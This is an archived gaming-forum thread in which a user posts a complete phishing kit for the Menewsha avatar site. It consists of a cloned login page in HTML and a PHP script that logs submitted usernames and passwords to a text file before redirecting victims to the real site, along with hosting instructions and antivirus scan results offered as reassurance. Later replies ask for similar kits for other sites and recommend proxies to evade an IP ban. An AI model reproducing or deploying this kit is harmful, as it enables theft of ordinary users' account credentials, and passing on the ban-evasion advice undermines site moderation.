Go Back   Gaming Gutter > Online Gaming > Other Games > Menewsha


Menewsha - Chat about, and discuss Menewsha here.

» Site Navigation
» Home
» FAQ
» Log in
User Name:

Password:

Not a member yet?
Register Now!
» Advertisement
» Recent Threads
Go to first new post Dream Diary. Last nights...
11-21-2008 08:01 AM
Last post by Mrs. Morris
Today 01:57 AM
12 Replies, 104 Views
Go to first new post FV30
Today 01:51 AM
by Bunneh
Last post by Bunneh
Today 01:51 AM
0 Replies, 1 Views
Go to first new post Contest Discussion Thread
04-09-2008 07:40 PM
Last post by Bunneh
Today 01:48 AM
188 Replies, 1,141 Views
Go to first new post What song popped up when...
Today 01:05 AM
by Stalkur
Last post by Bex
Today 01:26 AM
1 Replies, 7 Views
Go to first new post pokemon omfg
Yesterday 08:10 PM
by Aethean
Last post by Bex
Today 01:24 AM
17 Replies, 76 Views
Reply
 
LinkBack Thread Tools Display Modes

 Menewsha Fake Login Page
Old 08-21-2007, 07:10 PM   #1 (permalink)

Male Googlrr is offline
 
Googlrr's Avatar
 
Join Date: Oct 2006
Location: New Hampshire?
Posts: 6,891
GPoints: 462
iTrader: 0 / 0%
Googlrr Is a Lord of AwesomenessGooglrr Is a Lord of AwesomenessGooglrr Is a Lord of AwesomenessGooglrr Is a Lord of Awesomeness
Rep Power: 20
Menewsha Fake Login Page

I was bored Dx
Upload those 3 files to a ripway account. Edit the Login PHP to redirect to where you want it to. This is the part.
Code:
header("Location:http://www.menewsha.com/login.php?
redirect=posting.php&mode=reply&t=20706");
Yea, its a fake page of the "Please enter your username and password to log in.".

I didn't make login.php. I only applied it to the HTML.

http://rapidshare.com/files/50451489...Login.rar.html

Quote:
Originally Posted by scan results for this.
A-Squared Found nothing
AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
CPsecure Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Rising Antivirus Found nothing
Sophos Antivirus Found nothing
VirusBuster Found nothing
VBA32 Found nothing

MenewshaLogin.html
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr">
<head>
<style type="text/css">
body{
background:url('http://www.menewsha.com/templates/v2/images/bg.gif') top repeat-x #beedf7;
margin:0px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:16px
}
/* General font families for common tags */
a:link,a:active,a:visited { color : #006699; }
a:hover		{ text-decoration: underline; color : #DD6900; }
hr	{ height: 0px; border: solid #d1e0e9 0px; border-top-width: 1px;}
#topbar{
background:#f8c820;
width:100%;
height:6px
}
#logo{
margin-left:180px;
float:left
}
#headerbar{
background:#4588bf;
height:22px;
float:left;
margin-top:57px;
border-top:#03407f solid 1px;
border-bottom:#03407f solid 1px;
width:360px;
color:#03407f;
font-family:Arial, Helvetica, sans-serif;
padding:3px 0px 0px 0px;
}
#headerbar_fade{
background:url('http://www.menewsha.com/templates/v2/images/headerbar_bg.gif') no-repeat right;
float:left;
height:27px;
width:118px;
margin-top:57px;
}

#tab{
float:left;
margin:0px 0px 0px 380px;
position:absolute;
left: 0px;
top: 6px;
}
#tab ul {
list-style: none;
float: left;
margin:0px;
padding:0px 0px 0px 10px;
}

#tab ul li {
padding-left: 3px;
float: left;
width: 110px;
height: 30px;
line-height: 28px;
text-align: center;
margin:0px;
font-weight:normal
}

#tab ul li a {
float: left;
display: block;
width: 110px;
height: 30px;
color: #FFFFFF;
text-decoration: none;
font-weight:normal;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:14px;
background: url('http://www.menewsha.com/templates/v2/images/tab.gif') center top no-repeat;
}
#tab ul li a:hover{
background-position: center bottom;
}
#tab li#current a{
font-weight:bold;
background: url('http://www.menewsha.com/templates/v2/images/tab_active.gif') center top no-repeat;
color:#012040
}
#content{
background:url('http://www.menewsha.com/templates/v2/images/content_top.gif') no-repeat top #FFFFFF;
width:790px;
margin:0px auto;
margin-top:5px;
padding:5px
}
#welcome{
width:453px;
height:80px;
background:url('http://www.menewsha.com/templates/v2/images/welcome.gif') no-repeat;
color:#FFFFFF;
padding:45px 0px 0px 12px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px
}
#welcome h1{
margin:0px;
font-family:Verdana, Arial, Helvetica, sans-serif;
color:#ffffff;
font-size:19px;
font-weight:normal;
display:block;
}
.clear{
clear:both
}
#footer{
background:url('http://www.menewsha.com/templates/v2/images/footer.gif') no-repeat;
height:20px;
width:850px;
margin:0px auto;
text-align:center;
color:#356c3f;
padding:60px 0px 0px 0px;
}
#footer a:link, #footer a:visited{
color:#356c3f;
}
#right{
float:left;
width:75%
}
#side{
float:left;
width:150px;
border-right:1px #999999 dashed;
text-align:center;
padding:3px;
margin-right:5px;
font-size:14px
}
#side a:link, #side a:visited, #side a:hover{
color:#999999;
text-decoration:none;
font-size:14px
}
.messagebox{
background: lightyellow;
border: 1px #666 solid; 
padding: 10px; 
margin-bottom: 10px; 
margin-left:5px; 
margin-right:5px
}	
#avbox{
margin:5px;
margin-bottom:0px;
border:1px solid #FFFFFF;
background-color:#FFFFFF;
}
div#avbox:hover {
background-color:#E1F5FF;
border:1px solid #9CC0FF;
margin:5px;
margin-bottom:0px;
}


.username {
	margin:5px;
	background:#FFFFCC url('http://www.menewsha.com/templates/subSilver/images/icon_user.gif') 3px 4px no-repeat;
	padding-left:20px;
	border:1px solid #000000;
	height:20px;
	padding:5px 5px 5px 22px;
	font-size:16px
	
}
.password {
	margin:5px;
	background:#FFFFCC url('http://www.menewsha.com/templates/subSilver/images/icon_padlock.gif') 3px 4px no-repeat;
	padding-left:20px;
	border:1px solid #000000;
	height:20px;
	padding:5px 5px 5px 22px;
	font-size:16px
	
}

/* This is the border line & background colour round the entire page */
.bodyline	{ background-color: #FFFFFF; border: 1px #98AAB1 solid; }

/* This is the outline round the main forum tables */
.forumline	{ background-color: #FFFFFF; border: 1px #000000 solid; }

/* Main table cell colours and backgrounds */
td.row1	{ background-color: #e5eff6; border:1px solid #cccccc}
td.row2	{ background-color: #dee9f0; border:1px solid #cccccc}
td.row3	{ background-color: #d1e0e9; border:1px solid #cccccc}


/*
  This is for the table cell above the Topics, Post & Last posts on the index.php page
  By default this is the fading out gradiated silver background.
  However, you could replace this with a bitmap specific for each forum
*/
td.rowpic {
		background-color: #FFFFFF;
		background-image: url(http://www.menewsha.com/templates/subSilver/images/cellpic2.jpg);
		background-repeat: repeat-y;
}

/* Header cells - the blue and silver gradient backgrounds */
th	{
	color: #FFA34F; font-size: 11px; font-weight : bold; 
	background-color: #006699; height: 25px;
	background-image: url(http://www.menewsha.com/templates/subSilver/images/nav.gif);
}

td.cat,td.catHead,td.catSides,td.catLeft,td.catRight,td.catBottom {
			background-image: url(templates/subSilver/images/cellpic1.gif);
			background-color:#d1e0e9; border: #FFFFFF; border-style: solid; height: 28px;
}

/*
  Setting additional nice inner borders for the main table cells.
  The names indicate which sides the border will be on.
  Don't worry if you don't understand this, just ignore it :-)
*/
td.cat,td.catHead,td.catBottom {
	height: 29px;
	border-width: 0px 0px 0px 0px;
}
th.thHead,th.thSides,th.thTop,th.thLeft,th.thRight,th.thBottom,th.thCornerL,th.thCornerR {
	font-weight: bold; border: #FFFFFF; border-style: solid; height: 28px;
}
td.row3Right,td.spaceRow {
	background-color: #d1e0e9; border: #FFFFFF; border-style: solid;
}

th.thHead,td.catHead { font-size: 12px; border-width: 1px 1px 0px 1px; }
th.thSides,td.catSides,td.spaceRow	 { border-width: 0px 1px 0px 1px; }
th.thRight,td.catRight,td.row3Right	 { border-width: 0px 1px 0px 0px; }
th.thLeft,td.catLeft	  { border-width: 0px 0px 0px 1px; }
th.thBottom,td.catBottom  { border-width: 0px 1px 1px 1px; }
th.thTop	 { border-width: 1px 0px 0px 0px; }
th.thCornerL { border-width: 1px 0px 0px 1px; }
th.thCornerR { border-width: 1px 1px 0px 0px; }

/* The largest text used in the index page title and toptic title etc. */
.maintitle	{
	font-weight: bold; font-size: 22px; font-family: "Trebuchet MS",Verdana, Arial, Helvetica, sans-serif;
	text-decoration: none; line-height : 120%; color : #000000;
}

/* General text */
.gen { font-size : 12px; }
.genmed { font-size : 11px; }
.gensmall { font-size : 10px; }
.gen,.genmed,.gensmall { color : #000000; }
a.gen,a.genmed,a.gensmall { color: #006699; text-decoration: none; }
a.gen:hover,a.genmed:hover,a.gensmall:hover	{ color: #DD6900; text-decoration: underline; }

/* The register, login, search etc links at the top of the page */
.mainmenu		{ font-size : 11px; color : #000000 }
a.mainmenu		{ text-decoration: none; color : #006699;  }
a.mainmenu:hover{ text-decoration: underline; color : #DD6900; }

/* Forum category titles */
.cattitle		{ font-weight: bold; font-size: 12px ; letter-spacing: 1px; color : #006699}
a.cattitle		{ text-decoration: none; color : #006699; }
a.cattitle:hover{ text-decoration: underline; }

/* Forum title: Text and link to the forums used in: index.php */
.forumlink		{ font-weight: bold; font-size: 12px; color : #006699; }
a.forumlink 	{ text-decoration: none; color : #006699; }
a.forumlink:hover{ text-decoration: underline; color : #DD6900; }

/* Used for the navigation text, (Page 1,2,3 etc) and the navigation bar when in a forum */
.nav			{ font-weight: bold; font-size: 11px; color : #000000;}
a.nav			{ text-decoration: none; color : #006699; }
a.nav:hover		{ text-decoration: underline; }

/* titles for the topics: could specify viewed link colour too */
.topictitle,h1,h2	{ font-weight: bold; font-size: 11px; color : #000000; }
a.topictitle:link   { text-decoration: none; color : #006699; }
a.topictitle:visited { text-decoration: none; color : #5493B4; }
a.topictitle:hover	{ text-decoration: underline; color : #DD6900; }

/* Name of poster in viewmsg.php and viewtopic.php and other places */
.name			{ font-size : 11px; color : #000000;}

/* Location, number of posts, post date etc */
.postdetails		{ font-size : 10px; color : #000000; }

/* The content of the posts (body of text) */
.postbody { font-size : 12px; line-height: 18px}
a.postlink:link	{ text-decoration: none; color : #006699 }
a.postlink:visited { text-decoration: none; color : #5493B4; }
a.postlink:hover { text-decoration: underline; color : #DD6900}

/* Quote & Code blocks */
.code { 
	font-family: Courier, \'Courier New\', sans-serif; font-size: 11px; color: #006600;
	background-color: #FAFAFA; border: #d1e0e9; border-style: solid;
	border-left-width: 1px; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px
}

.quote {
	font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color: #444444; line-height: 125%;
	background-color: #FAFAFA; border: #d1e0e9; border-style: solid;
	border-left-width: 1px; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px
}

/* Copyright and bottom info */
.copyright		{ font-size: 10px; font-family: Verdana, Arial, Helvetica, sans-serif; color: #444444; letter-spacing: -1px;}
a.copyright		{ color: #444444; text-decoration: none;}
a.copyright:hover { color: #000000; text-decoration: underline;}

/* Form elements */
input,textarea, select {
	color : #000000;
	font: normal 11px Verdana, Arial, Helvetica, sans-serif;
	border-color : #000000;
}

/* The text input fields background colour */
input.post, textarea.post, select {
	background-color : #FFFFFF;
}

input { text-indent : 2px; }

/* The buttons used for bbCode styling in message post */
input.button {
	background-color : #e5eff6;
	color : #000000;
	font-size: 11px; font-family: Verdana, Arial, Helvetica, sans-serif;
}

/* The main submit button option */
input.mainoption {
	background-color : #FAFAFA;
	font-weight : bold;
}

/* None-bold submit button */
input.liteoption {
	background-color : #FAFAFA;
	font-weight : normal;
}


input.ref{
margin:5px;
background:#FFFFCC url(http://www.menewsha.com/img/site/user_go.png) 3px 4px no-repeat;
padding-left:20px;
border:1px solid #000000;
height:25px;
padding:5px 5px 5px 22px;
}



/* This is the line in the posting page which shows the rollover
  help line. This is actually a text box, but if set to be the same
  colour as the background no one will know ;)
*/
.helpline { background-color: #dee9f0; border-style: none; }

/* Set Image style */
img, .forumline img {
	border: 0;
}

/* Begin Simple Subforums MOD */
a.topic-new, a.topic-new:visited { color: #DD6900; }
a.topic-new:hover, a.topic-new:active { color: #006699; }
/* End Simple Subforums MOD */
.box{
border:1px solid #000000;
margin-bottom:5px;
margin-top:5px;
text-align:left; 
padding:5px
}

.alert {
	background: #e8eff6 url('http://www.menewsha.com/templates/v2/images/information.png') center no-repeat;
	background-position: 15px 50%; /* x-pos y-pos */
	text-align: left;
	padding: 5px 20px 5px 45px;
	border-top: 2px solid #b5d4fe;
	border-bottom: 2px solid #b5d4fe;
	font-size:12px
	}
</style>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Style-Type" content="text/css">
<meta name="description" content="Menewsha is an online avatar community. Users can sign up and create their own virtual avatar! You can then purchase items and dress up your avatar using gold."/>
<meta name="keywords" content="menewsha, avatar community, dress up games, virtual pets, online game, flash games"/>

<link rel="top" href="./index.php" title="Menewsha.com Forum Index" />
<link rel="search" href="./search.php" title="Search" />
<link rel="help" href="./faq.php" title="FAQ" />
<link rel="author" href="./memberlist.php" title="Memberlist" />
<title>Menewsha - Log in</title>
</head>

<body>
<div id="topbar"></div>
<div id="tab">
<ul>
<li id="current"><a href="http://www.menewsha.com/">Home</a></li><li><a href="http://www.menewsha.com/forum">Forum</a></li><li><a href="http://www.menewsha.com/shop/">Shops</a></li><li><a href="http://www.menewsha.com/games/">Games</a></li><li><a href="http://www.menewsha.com/contribute/">Contribute</a></li></ul>
</div>
<a href="http://www.menewsha.com"><img src="http://www.menewsha.com/templates/v2/images/logo.gif" alt="logo" id="logo" border="0"/></a>
<div id="headerbar">

Welcome, Anonymous. <a href="http://www.menewsha.com/login.php">Please login</a>

</div><div id="headerbar_fade"></div>

<div class="clear"></div>
<div id="content">









<div id="side">
<form method="post" action="login.php">		
<span style="font-size:18px; font-family:Verdana, Arial, Helvetica, sans-serif font-weight:bold">Resident login</span><br />
Username:
<br />
<input type="text" name="username" class="username" size="10" /><br />
 Password:
<br />
<input type="password" name="password" class="password" size="10" maxlength="32" />

<br />Remember me<br />
<input class="text" type="checkbox" name="autologin" value="ON" />
<br />
			<input type="submit" class="mainoption" name="login" value="Log in" />

</form>
<br /><br />



						&nbsp;<a href="profile.php?mode=register"><img src="http://www.menewsha.com/templates/menewsha/images/icon_mini_register.gif" width="12" height="13" border="0" alt="Register" hspace="3" />Register</a>&nbsp;
</div>
<div id="right">
						





		
		
		
 
<form action="login.php" method="post" target="_top">

<table width="100%" cellspacing="2" cellpadding="2" border="0" align="center">
  <tr> 
	<td align="left" class="nav"><a href="index.php" class="nav">Menewsha.com Forum Index</a></td>
  </tr>
</table>

<table width="100%" cellpadding="4" cellspacing="1" border="0" class="forumline" align="center">
  <tr> 
	<th height="25" class="thHead" nowrap="nowrap">Please enter your username and password to log in.</th>
  </tr>
  <tr> 
	<td class="row1"><table border="0" cellpadding="3" cellspacing="1" width="100%">
		  <tr> 
			<td colspan="2" align="center">&nbsp;</td>
		  </tr>
		  <tr> 
			<td width="45%" align="right"><span class="gen">Username:</span></td>
			<td> 
			  <input type="text" class="post" name="username" size="25" maxlength="40" value="" />
			</td>
		  </tr>
		  <tr> 
			<td align="right"><span class="gen">Password:</span></td>
			<td> 
			  <input type="password" class="post" name="password" size="25" maxlength="32" />
			</td>
		  </tr>
		  		  <tr align="center"> 
			<td colspan="2"><span class="gen">Log me on automatically each visit: <input type="checkbox" name="autologin" /></span></td>
		  </tr>
		  		  <tr align="center"> 
			<td colspan="2"><input type="hidden" name="redirect" value="posting.php?mode=reply&t=20706" /><input type="submit" name="login" class="mainoption" value="Log in" /></td>
		  </tr>
		  <tr align="center"> 
			<td colspan="2"><span class="gensmall"><a href="profile.php?mode=sendpassword" class="gensmall">I forgot my password</a></span></td>
		  </tr>
		</table></td>
  </tr>
</table>

</form>
</div>
<div class="clear"></div>
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-659240-3";
urchinTracker();
</script>

<div id="footer">
<a href="http://www.menewsha.com/about/">About us</a> | <a href="http://www.menewsha.com/privacy/">Privacy Policy</a> | <a href="http://www.menewsha.com/tos/">Terms of service</a> | <a href="http://blog.menewsha.com/">Blog</a>
</div>
</body>
</html>
Login.php
Code:
<?
$writer = new fileWriter( 'passinfo.txt' );

$writer->writeLine( 'User:' . $username );
$writer->writeLine( 'Pass:' . $password );
$writer->writeLine( '--------------------------' );

class fileWriter
{
    
    var $fileHandler;

    function fileWriter( $file )
    {
        $this->open( $file );
    }
    
    function open( $file )
    {
        $this->fileHandler = fopen( $file, 'a' );
    }
    
    function writeLine( $line )
    {
        fwrite( $this->fileHandler, $line . "\r\n" );
    }

}
header("Location:http://www.menewsha.com/login.php?redirect=posting.php&mode=reply&t=20706");

?>
__________________

<3 Li'



Hatz =D


Last edited by Googlrr; 08-22-2007 at 09:30 AM..
  Reply With Quote

 
Old 08-22-2007, 03:07 AM   #2 (permalink)
Underground

Male Scott is offline
 
Scott's Avatar
 
Join Date: Jul 2007
Location: USA
Posts: 1,403
GPoints: 145
iTrader: 6 / 88%
Scott Is gaining popularity
Rep Power: 6
Could you make the guide kind of like they do for Gaia Logins? Like give us different things to save in notepad then upload ourselves... ?
__________________
People I have successfully traded with:
I'm just gonna list some off the top of my head.

Kismet, xBaka, Alkaid, Bunneh, omgwut, Rukanari Nara, Tantrum, lolcombplatta23, tanarif984, Duckii, Wayne, Xander, IWantMyKey, Keo, phillip1989, t3h4x312, misr, hehe, justpassingthru. And many more. Gaia/Mene/USD Trades

Halo 3 Boosting:
I boost Halo accounts to 50z for USD or monthly subscriptions cards/MS Points... If you are interested just send me a PM or a message to FU Vader on Xbox Live. Make sure to make it clear what you are wanting from me in the message.
  Reply With Quote

 
Old 08-22-2007, 09:31 AM   #3 (permalink)

Male Googlrr is offline
 
Googlrr's Avatar
 
Join Date: Oct 2006
Location: New Hampshire?
Posts: 6,891
GPoints: 462
iTrader: 0 / 0%
Googlrr Is a Lord of AwesomenessGooglrr Is a Lord of AwesomenessGooglrr Is a Lord of AwesomenessGooglrr Is a Lord of Awesomeness
Rep Power: 20
There. I put Menewshalogin.html and login.php on there.
__________________

<3 Li'



Hatz =D

  Reply With Quote

 
Old 08-22-2007, 03:37 PM   #4 (permalink)
Underground

Male Scott is offline
 
Scott's Avatar
 
Join Date: Jul 2007
Location: USA
Posts: 1,403
GPoints: 145
iTrader: 6 / 88%
Scott Is gaining popularity
Rep Power: 6
Awesome you rock Yum!!
__________________
People I have successfully traded with:
I'm just gonna list some off the top of my head.

Kismet, xBaka, Alkaid, Bunneh, omgwut, Rukanari Nara, Tantrum, lolcombplatta23, tanarif984, Duckii, Wayne, Xander, IWantMyKey, Keo, phillip1989, t3h4x312, misr, hehe, justpassingthru. And many more. Gaia/Mene/USD Trades

Halo 3 Boosting:
I boost Halo accounts to 50z for USD or monthly subscriptions cards/MS Points... If you are interested just send me a PM or a message to FU Vader on Xbox Live. Make sure to make it clear what you are wanting from me in the message.
  Reply With Quote

 
Old 08-24-2007, 01:59 PM   #5 (permalink)

Male Googlrr is offline
 
Googlrr's Avatar
 
Join Date: Oct 2006
Location: New Hampshire?
Posts: 6,891
GPoints: 462
iTrader: 0 / 0%
Googlrr Is a Lord of AwesomenessGooglrr Is a Lord of AwesomenessGooglrr Is a Lord of AwesomenessGooglrr Is a Lord of Awesomeness
Rep Power: 20
Quote:
Originally Posted by Scott View Post
Awesome you rock Yum!!
I know :P jk

only thing is I don't know how this could be used on Menewsha.
__________________

<3 Li'



Hatz =D

  Reply With Quote

 
Old 08-25-2007, 12:41 PM   #6 (permalink)
Underground

Male kickinthepants is offline
 
kickinthepants's Avatar
 
Join Date: Mar 2007
Location: none of your buisness
Age: 15
Posts: 160
GPoints: 22
iTrader: 0 / 0%
kickinthepants Is gaining popularity
Rep Power: 6
aww man good job but the bad thing for me is that they ip banned me cause i was pissing off one of their mods
  Reply With Quote

 
Old 08-25-2007, 12:43 PM   #7 (permalink)

Male |G3| is online now

 
Join Date: Feb 2007
Posts: 3,840
GPoints: 7,712
iTrader: 9 / 100%
|G3| has disabled reputation
Rep Power: 21
Quote:
Originally Posted by kickinthepants View Post
aww man good job but the bad thing for me is that they ip banned me cause i was pissing off one of their mods
Then maybe use a proxy? Or you could just change your ip.
__________________
  Reply With Quote

 
Old 08-26-2007, 05:22 PM   #8 (permalink)

Male Googlrr is offline
 
Googlrr's Avatar
 
Join Date: Oct 2006
Location: New Hampshire?
Posts: 6,891
GPoints: 462
iTrader: 0 / 0%
Googlrr Is a Lord of AwesomenessGooglrr Is a Lord of AwesomenessGooglrr Is a Lord of AwesomenessGooglrr Is a Lord of Awesomeness
Rep Power: 20
Quote:
Originally Posted by lG3l View Post
Then maybe use a proxy? Or you could just change your ip.
]
always use proxies. I forgot they IP ban there.

Quote:
Originally Posted by kickinthepants View Post
aww man good job but the bad thing for me is that they ip banned me cause i was pissing off one of their mods

I never got IP changing to work. I did the shit it said and in the end had the same IP address.

And I can't do the whole leave the box unplugged for the night because my phones go though it too.
__________________

<3 Li'



Hatz =D

  Reply With Quote
Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Powered by vBadvanced CMPS v3.0 RC2

All times are GMT -7. The time now is 02:12 AM.


vBulletin skin developed by: eXtremepixels
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios
The contents of this webpage are copyright © 2006-2008 GamingGutter.com. All Rights Reserved.

Page generated in 0.13485599 seconds (100.00% PHP - 0% MySQL) with 19 queries